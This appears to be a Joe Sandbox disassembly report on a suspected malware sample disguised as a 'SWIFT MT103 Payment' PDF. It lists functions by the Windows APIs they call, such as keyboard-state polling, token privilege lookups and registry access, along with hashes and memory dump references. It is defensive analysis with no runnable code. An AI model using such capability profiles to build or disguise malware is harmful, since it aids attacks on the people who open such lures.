                                                        • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                        • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                        • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                        • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CharNext
                                                        • String ID:
                                                        • API String ID: 1350042424-0
                                                        • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                        • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                        • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                        • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                        APIs
                                                        • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                        • SetKeyboardState.USER32(?), ref: 00453C5A
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                        • GetKeyState.USER32(000000A0), ref: 00453C99
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                        • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                        • GetKeyState.USER32(00000011), ref: 00453D15
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                        • GetKeyState.USER32(00000012), ref: 00453D4D
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                        • GetKeyState.USER32(0000005B), ref: 00453D85
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                        • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                        • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                        • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                        • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                        • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                        • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                        • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                        • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                        • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                        • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                        • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                        • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                        • String ID:
                                                        • API String ID: 136442275-0
                                                        • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                        • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                        • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                        • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_wcslen
                                                        • String ID: HH
                                                        • API String ID: 535477410-2761332787
                                                        • Opcode ID: a7e0431b60c683f015394a84508b661f8f04f2f815b395ac32e10eef4411514b
                                                        • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                        • Opcode Fuzzy Hash: a7e0431b60c683f015394a84508b661f8f04f2f815b395ac32e10eef4411514b
                                                        • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                        • _wcslen.LIBCMT ref: 00460502
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                        • GetWindowRect.USER32(?,?), ref: 004606AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                        • String ID: ThumbnailClass
                                                        • API String ID: 4123061591-1241985126
                                                        • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                        • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                        • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                        • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                        APIs
                                                          • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                          • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                          • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                          • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                        • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                        • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                        • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                        • ReleaseCapture.USER32 ref: 0046F589
                                                        • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                        • API String ID: 2483343779-2060113733
                                                        • Opcode ID: 6817a6ec856fbae515f8bb33f78f5e1c2ffd77adef612602a1ed80cc7d67db9d
                                                        • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                        • Opcode Fuzzy Hash: 6817a6ec856fbae515f8bb33f78f5e1c2ffd77adef612602a1ed80cc7d67db9d
                                                        • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                        APIs
                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                        • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                        • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                        • DestroyIcon.USER32(?), ref: 0046FFCC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                        • String ID: 2
                                                        • API String ID: 1331449709-450215437
                                                        • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                        • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                        • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                        • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow
                                                        • String ID: static
                                                        • API String ID: 3375834691-2160076837
                                                        • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                        • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                        • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                        • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                        • _memcmp.LIBCMT ref: 004394A9
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                        Strings
                                                        • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                        • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                        • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                        • API String ID: 1446985595-805462909
                                                        • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                        • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                        • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                        • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                        • API String ID: 2907320926-41864084
                                                        • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                        • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                        • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                        • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                        APIs
                                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                        • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID:
                                                        • API String ID: 1932665248-0
                                                        • Opcode ID: e840c1aab5529a10ce2559c107df36ddbf94ec1eb142649500add679c5699491
                                                        • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                        • Opcode Fuzzy Hash: e840c1aab5529a10ce2559c107df36ddbf94ec1eb142649500add679c5699491
                                                        • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                        • _memset.LIBCMT ref: 004481BA
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                        • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                        • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                        • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                        • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                        APIs
                                                          • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                        • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                        • DeleteObject.GDI32(00730000), ref: 0046EB4F
                                                        • DestroyIcon.USER32(0041005C), ref: 0046EB67
                                                        • DeleteObject.GDI32(CC652443), ref: 0046EB7F
                                                        • DestroyWindow.USER32(0055005C), ref: 0046EB97
                                                        • DestroyIcon.USER32(?), ref: 0046EBBF
                                                        • DestroyIcon.USER32(?), ref: 0046EBCD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                        • String ID:
                                                        • API String ID: 802431696-0
                                                        • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                        • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                        • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                        • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
